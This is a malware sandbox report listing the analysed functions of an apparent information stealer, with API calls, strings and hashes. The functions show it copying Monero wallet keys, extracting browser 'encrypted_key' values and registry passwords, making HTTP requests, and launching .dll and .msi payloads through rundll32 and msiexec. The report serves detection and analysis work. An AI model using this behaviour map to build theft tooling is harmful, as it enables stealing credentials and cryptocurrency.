                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateGlobalStream
                  • String ID: image/jpeg
                  • API String ID: 2244384528-3785015651
                  • Opcode ID: 2bfe84211569f1efce92c8ca73a53c783a3484225dd8562798587b37d6d3f81a
                  • Instruction ID: 9b217c49b39cb2216771bb4e3ebd819e8135f7a85db8da66c339d029d7559bd4
                  • Opcode Fuzzy Hash: 2bfe84211569f1efce92c8ca73a53c783a3484225dd8562798587b37d6d3f81a
                  • Instruction Fuzzy Hash: B671BB75D10208ABDB04EFE4DD89FEEB7BDAF88710F108508F615AB290DB34A945CB61
                  Function 009B2E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                  • ShellExecuteEx.SHELL32(0000003C), ref: 009B31C5
                  • ShellExecuteEx.SHELL32(0000003C), ref: 009B335D
                  • ShellExecuteEx.SHELL32(0000003C), ref: 009B34EA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExecuteShell$lstrcpy
                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                  • API String ID: 2507796910-3625054190
                  • Opcode ID: d8d22a2592be5820578d1949ed403e5a4aef997cba9b8648e190610094ef0803
                  • Instruction ID: 7bd58527d07835e0e61ee16a699d9dc4f8f0320e93a7ec4eb989481f355e22f0
                  • Opcode Fuzzy Hash: d8d22a2592be5820578d1949ed403e5a4aef997cba9b8648e190610094ef0803
                  • Instruction Fuzzy Hash: 76122D71C00108AADB19FBA0DE92FEEB778AF94310F504159F50676591EF342B4ACFA6
                  Function 009B52C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                    • Part of subcall function 009A6280: InternetOpenA.WININET(009C0DFE,00000001,00000000,00000000,00000000), ref: 009A62E1
                    • Part of subcall function 009A6280: StrCmpCA.SHLWAPI(?,015EF828), ref: 009A6303
                    • Part of subcall function 009A6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 009A6335
                    • Part of subcall function 009A6280: HttpOpenRequestA.WININET(00000000,GET,?,015EEEA8,00000000,00000000,00400100,00000000), ref: 009A6385
                    • Part of subcall function 009A6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009A63BF
                    • Part of subcall function 009A6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009A63D1
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 009B5318
                  • lstrlen.KERNEL32(00000000), ref: 009B532F
                    • Part of subcall function 009B8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009B8E52
                  • StrStrA.SHLWAPI(00000000,00000000), ref: 009B5364
                  • lstrlen.KERNEL32(00000000), ref: 009B5383
                  • lstrlen.KERNEL32(00000000), ref: 009B53AE
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 3240024479-1526165396
                  • Opcode ID: 90e0f8173c3eaa3b72313e7b1f276cb96662967fb0a9618054fa2cde078ce486
                  • Instruction ID: e5c0a9f629cb90c6423eef759d02a10e68f547507c61ab2f5372e5c786a1d8ab
                  • Opcode Fuzzy Hash: 90e0f8173c3eaa3b72313e7b1f276cb96662967fb0a9618054fa2cde078ce486
                  • Instruction Fuzzy Hash: 51512030910148ABCB24FF60CEA6FED7779AF91721F504018F4066B592EF746B46CBA6
                  Function 009B12D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen
                  • String ID:
                  • API String ID: 2001356338-0
                  • Opcode ID: 10bc10f4179af1bb9050b468ed556afdd773f35113d4bce0518ea277514cc4ee
                  • Instruction ID: ef82bd6bfd396fbaae0ce5ed489010e2a7ac9d7d189893c4671da5bf0d1e3e77
                  • Opcode Fuzzy Hash: 10bc10f4179af1bb9050b468ed556afdd773f35113d4bce0518ea277514cc4ee
                  • Instruction Fuzzy Hash: 24C1A5B590021DABCB14EF60DDD9FEE7378BB98314F004599E50A67281DF70AA85CFA1
                  Function 009B4280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 009B8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 009B42EC
                  • lstrcat.KERNEL32(?,015EED70), ref: 009B430B
                  • lstrcat.KERNEL32(?,?), ref: 009B431F
                  • lstrcat.KERNEL32(?,015EE300), ref: 009B4333
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009B8D90: GetFileAttributesA.KERNEL32(00000000,?,009A1B54,?,?,009C564C,?,?,009C0E1F), ref: 009B8D9F
                    • Part of subcall function 009A9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 009A9D39
                    • Part of subcall function 009A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009A99EC
                    • Part of subcall function 009A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 009A9A11
                    • Part of subcall function 009A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 009A9A31
                    • Part of subcall function 009A99C0: ReadFile.KERNEL32(000000FF,?,00000000,009A148F,00000000), ref: 009A9A5A
                    • Part of subcall function 009A99C0: LocalFree.KERNEL32(009A148F), ref: 009A9A90
                    • Part of subcall function 009A99C0: CloseHandle.KERNEL32(000000FF), ref: 009A9A9A
                    • Part of subcall function 009B93C0: GlobalAlloc.KERNEL32(00000000,009B43DD,009B43DD), ref: 009B93D3
                  • StrStrA.SHLWAPI(?,015EED58), ref: 009B43F3
                  • GlobalFree.KERNEL32(?), ref: 009B4512
                    • Part of subcall function 009A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,009A4EEE,00000000,00000000), ref: 009A9AEF
                    • Part of subcall function 009A9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,009A4EEE,00000000,?), ref: 009A9B01
                    • Part of subcall function 009A9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,009A4EEE,00000000,00000000), ref: 009A9B2A
                    • Part of subcall function 009A9AC0: LocalFree.KERNEL32(?,?,?,?,009A4EEE,00000000,?), ref: 009A9B3F
                  • lstrcat.KERNEL32(?,00000000), ref: 009B44A3
                  • StrCmpCA.SHLWAPI(?,009C08D1), ref: 009B44C0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 009B44D2
                  • lstrcat.KERNEL32(00000000,?), ref: 009B44E5
                  • lstrcat.KERNEL32(00000000,009C0FB8), ref: 009B44F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                  • String ID:
                  • API String ID: 3541710228-0
                  • Opcode ID: 01398a7b6a6951b7728476629a2b396ff0de6345ce62e7ca4966b9d1a7540ffd
                  • Instruction ID: 1de741367cad22e6eec7ff389754fdbe669033d1ec9d44a8ea32f5c14a9edad1
                  • Opcode Fuzzy Hash: 01398a7b6a6951b7728476629a2b396ff0de6345ce62e7ca4966b9d1a7540ffd
                  • Instruction Fuzzy Hash: 0F7145B6D00208BBDB14EBA0DD85FEE777DAB88310F004598F60597181EE75EB45CB91
                  Function 009A1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009A12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009A12B4
                    • Part of subcall function 009A12A0: RtlAllocateHeap.NTDLL(00000000), ref: 009A12BB
                    • Part of subcall function 009A12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009A12D7
                    • Part of subcall function 009A12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009A12F5
                    • Part of subcall function 009A12A0: RegCloseKey.ADVAPI32(?), ref: 009A12FF
                  • lstrcat.KERNEL32(?,00000000), ref: 009A134F
                  • lstrlen.KERNEL32(?), ref: 009A135C
                  • lstrcat.KERNEL32(?,.keys), ref: 009A1377
                    • Part of subcall function 009BA740: lstrcpy.KERNEL32(009C0E17,00000000), ref: 009BA788
                    • Part of subcall function 009BA9B0: lstrlen.KERNEL32(?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009BA9C5
                    • Part of subcall function 009BA9B0: lstrcpy.KERNEL32(00000000), ref: 009BAA04
                    • Part of subcall function 009BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009BAA12
                    • Part of subcall function 009BA8A0: lstrcpy.KERNEL32(?,009C0E17), ref: 009BA905
                    • Part of subcall function 009B8B60: GetSystemTime.KERNEL32(009C0E1A,015EB008,009C05AE,?,?,009A13F9,?,0000001A,009C0E1A,00000000,?,015E9EF8,?,\Monero\wallet.keys,009C0E17), ref: 009B8B86
                    • Part of subcall function 009BA920: lstrcpy.KERNEL32(00000000,?), ref: 009BA972
                    • Part of subcall function 009BA920: lstrcat.KERNEL32(00000000), ref: 009BA982
                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 009A1465
                    • Part of subcall function 009BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 009BA7E6
                    • Part of subcall function 009A99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009A99EC
                    • Part of subcall function 009A99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 009A9A11
                    • Part of subcall function 009A99C0: LocalAlloc.KERNEL32(00000040,?), ref: 009A9A31
                    • Part of subcall function 009A99C0: ReadFile.KERNEL32(000000FF,?,00000000,009A148F,00000000), ref: 009A9A5A
                    • Part of subcall function 009A99C0: LocalFree.KERNEL32(009A148F), ref: 009A9A90
                    • Part of subcall function 009A99C0: CloseHandle.KERNEL32(000000FF), ref: 009A9A9A
                  • DeleteFileA.KERNEL32(00000000), ref: 009A14EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                  • API String ID: 3478931302-218353709
                  • Opcode ID: a89152d7ccb6d68b24dcec253436f125d60237e1431b200b9d88ba839cbb0952
                  • Instruction ID: 36491914b9cd12d16f1b70dc6fc796302e15d1e26f624eff811bd24daf7e6e5c
                  • Opcode Fuzzy Hash: a89152d7ccb6d68b24dcec253436f125d60237e1431b200b9d88ba839cbb0952
                  • Instruction Fuzzy Hash: 945157B1D501196BCB15FB60DDA1FED737CAF94710F404198B60A67091EE306B89CFA6
                  Function 009A75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009A72D0: memset.MSVCRT ref: 009A7314
                    • Part of subcall function 009A72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 009A733A
                    • Part of subcall function 009A72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009A73B1
                    • Part of subcall function 009A72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 009A740D
                    • Part of subcall function 009A72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 009A7452
                    • Part of subcall function 009A72D0: HeapFree.KERNEL32(00000000), ref: 009A7459
                  • lstrcat.KERNEL32(00000000,009C17FC), ref: 009A7606
                  • lstrcat.KERNEL32(00000000,00000000), ref: 009A7648
                  • lstrcat.KERNEL32(00000000, : ), ref: 009A765A
                  • lstrcat.KERNEL32(00000000,00000000), ref: 009A768F
                  • lstrcat.KERNEL32(00000000,009C1804), ref: 009A76A0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 009A76D3
                  • lstrcat.KERNEL32(00000000,009C1808), ref: 009A76ED
                  • task.LIBCPMTD ref: 009A76FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                  • String ID: :
                  • API String ID: 3191641157-3653984579
                  • Opcode ID: d4ff5a68927f3f46f3fd9cda3c2fe66a23b35b9a8b036dd8d8e59fa7b3d83ccd
                  • Instruction ID: de771e3dab974b32e5ce0157fffcc0c820bc40edf3e3ec4fac0f10cce8cf3e94
                  • Opcode Fuzzy Hash: d4ff5a68927f3f46f3fd9cda3c2fe66a23b35b9a8b036dd8d8e59fa7b3d83ccd
                  • Instruction Fuzzy Hash: B131EB71D04149EFCB04EBE4DC96EEFB779AB86701B144518F102AB291DE34B946CB92
                  Function 009A72D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • memset.MSVCRT ref: 009A7314
                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 009A733A
                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009A73B1
                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 009A740D
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 009A7452
                  • HeapFree.KERNEL32(00000000), ref: 009A7459
                  • task.LIBCPMTD ref: 009A7555
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$EnumFreeOpenProcessValuememsettask
                  • String ID: Password
                  • API String ID: 2808661185-3434357891
                  • Opcode ID: 5a33c50015ea1c7293429c6fab94379c2edac611e2ad28714673b2575d9196d4
                  • Instruction ID: 0a196b1ab03836c0867c996e60187d83fb4b927431f901074e2ae298ccdb559f
                  • Opcode Fuzzy Hash: 5a33c50015ea1c7293429c6fab94379c2edac611e2ad28714673b2575d9196d4
                  • Instruction Fuzzy Hash: F06109B5D042689BDB24DB50CC45BDAB7BCBF89304F0081E9E649A6141EB706BC9CFA1
                  Function 009B8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,015EF298,00000000,?,009C0E2C,00000000,?,00000000), ref: 009B8130
                  • RtlAllocateHeap.NTDLL(00000000), ref: 009B8137
                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 009B8158
                  • __aulldiv.LIBCMT ref: 009B8172
                  • __aulldiv.LIBCMT ref: 009B8180
                  • wsprintfA.USER32 ref: 009B81AC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1771028877.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                  • Associated: 00000000.00000002.1771003555.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000A82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771028877.0000000000BEA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000BFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000D7B000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E73000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771226326.0000000000E82000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771523665.0000000000E83000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771647773.000000000100E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1771667968.000000000100F000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                  • String ID: %d MB$@
                  • API String ID: 2774356765-3474575989
